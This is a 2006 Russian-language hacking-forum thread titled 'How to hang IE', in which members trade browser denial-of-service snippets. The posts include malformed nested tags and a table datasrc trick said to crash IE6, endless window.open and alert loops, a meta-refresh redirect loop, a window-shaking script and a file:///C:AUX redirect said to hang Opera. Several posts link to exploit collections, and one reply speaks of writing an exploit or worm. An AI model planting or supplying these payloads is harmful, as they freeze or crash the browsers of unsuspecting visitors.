ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как повесить IE
  #1  
Старый 15.07.2006, 19:01
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
Smile Как повесить IE

Я увидел что в знаменитом браузере Internet explorer сюществует полно багов, поэтому я подумал что это может быть не плохо если я открою топик в котором каждый будет описывать разные баги которые существуют в браузере Internet explorer .

Правила публикации багов очень просты:

1. Расскажите немного про баг.
2. Кем был он найден.





Я начинаю.

Баг в IE 6

Этот баг позволяет сделать DoS (Denial of Service или Отказ от Обслуживания) атаку на IE 6 пока он не рухнет.
Как я слышал он был найден командой FIRST.
Код:
Код:
# <acronym><dd><h5><applet></caption></applet></h1>
Или просто напишите это:
Код:
<table datasrc=".">

Последний раз редактировалось dracula4ever; 15.07.2006 в 21:38..
 
Ответить с цитированием

  #2  
Старый 15.07.2006, 19:53
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

http://browserfun.blogspot.com/

новейшие сплоиты каждый день
 
Ответить с цитированием

  #3  
Старый 15.07.2006, 20:34
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Вот еще один DoS.
Был найден юзером jsz.
Этот баг загружает браузер пока он не рухает.

Код:
Код:
<meta http-equiv="refresh" content="0;url=mkmk.html">
<SCRIPT LANGUAGE="javascript">
<!--
window.open ('ms-ie.html')
-->
</SCRIPT>
 
Ответить с цитированием

  #4  
Старый 15.07.2006, 21:23
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Дракула, браузерный убийца...+))))
http://www.milw0rm.com/search.php?dong=Internet+Explorer
__________________
 
Ответить с цитированием

  #5  
Старый 15.07.2006, 22:14
Дикс
Познавший АНТИЧАТ
Регистрация: 16.04.2006
Сообщений: 1,488
Провел на форуме:
2209675

Репутация: 537


Отправить сообщение для Дикс с помощью ICQ
По умолчанию

<meta http-equiv='refresh' content='0; index.php'>
бесконечный редирект страницы на самую себя.
был найден мной. две минуты назад. я как раз зашёл сюда чтобы об этом написать
 
Ответить с цитированием

  #6  
Старый 16.07.2006, 11:16
Eco[L]og
Новичок
Регистрация: 02.07.2006
Сообщений: 24
Провел на форуме:
65670

Репутация: 14
По умолчанию

Вот сразу 3 бага для ослика. Кто нашел незнаю.

Первый:
Открывает множество окон
Код HTML:
<script>
now();
function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}}
</script>
Второй:
Выводит сообщение ERROR и делает открытое окно недоступным
Код HTML:
<script>
{ while ( true ) window.alert('ERROR !'); } 
</script>
Третий:
трясет окно Обозревателя
Код HTML:
<body onloaD="MM_callJS('shake();')">
<script language="JavaScript1.2">
function shake() {
n=100;
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
self.moveBy(0,i);
self.moveBy(i,0);
self.moveBy(0,-i);
self.moveBy(-i,0);
}
}
}
function MM_callJS(jsStr) { file://v2.0
return eval(jsStr)
}
</script> 
 
Ответить с цитированием

  #7  
Старый 16.07.2006, 11:36
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Eco[L]og так держать =)
Я продолжаю.


Этот баг был найден Stelian Ene и он работает в IE 6.
Ксожелению я про него ничего не могу рассказать.

Код:
<input type="checkbox" id='c'>
<script>
        r=document.getElementById("c");
        a=r.createTextRange();
</script>
 
Ответить с цитированием

  #8  
Старый 16.07.2006, 11:41
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Цитата:
Сообщение от Eco[L]og  
Вот сразу 3 бага для ослика. Кто нашел незнаю.

Первый:
Открывает множество окон
Код HTML:
<script>
now();
function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}}
</script>
Второй:
Выводит сообщение ERROR и делает открытое окно недоступным
Код HTML:
<script>
{ while ( true ) window.alert('ERROR !'); } 
</script>
Третий:
трясет окно Обозревателя
Код HTML:
<body onloaD="MM_callJS('shake();')">
<script language="JavaScript1.2">
function shake() {
n=100;
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
self.moveBy(0,i);
self.moveBy(i,0);
self.moveBy(0,-i);
self.moveBy(-i,0);
}
}
}
function MM_callJS(jsStr) { file://v2.0
return eval(jsStr)
}
</script> 
Гы =))) Это баги? Да это просто скрипты

Последний раз редактировалось bandera; 16.07.2006 в 11:48..
 
Ответить с цитированием

  #9  
Старый 17.07.2006, 20:36
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Бегущие полосы вешающите Ie
Код:
<HTML>
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2){
x = 0;
} 
}
</SCRIPT>
</BODY>
</HTML>
это только для IE
А вот эта штука оперу вешает.
Код:
<script>
parent.location="file:///C:AUX";
</script>
 
Ответить с цитированием

  #10  
Старый 18.07.2006, 07:35
Rubick
Новичок
Регистрация: 13.07.2006
Сообщений: 6
Провел на форуме:
26770

Репутация: 1
По умолчанию

Народ, а не кто не копал дальше последнюю статью в ][ про новую уязвимость в ишаке? Там насколько я помню дело встало за написанием плагина к Ольке, чтобы откапать в каком именно месте идет переполнение, без этого ни экплоита ни червячка не напишешь. Это насколько я понимаю настоящая уязвимость.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Среди людей мы иные, но даже среди иных мы остаёмся людьми MorpheuS Авторские статьи 34 16.06.2010 02:57
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ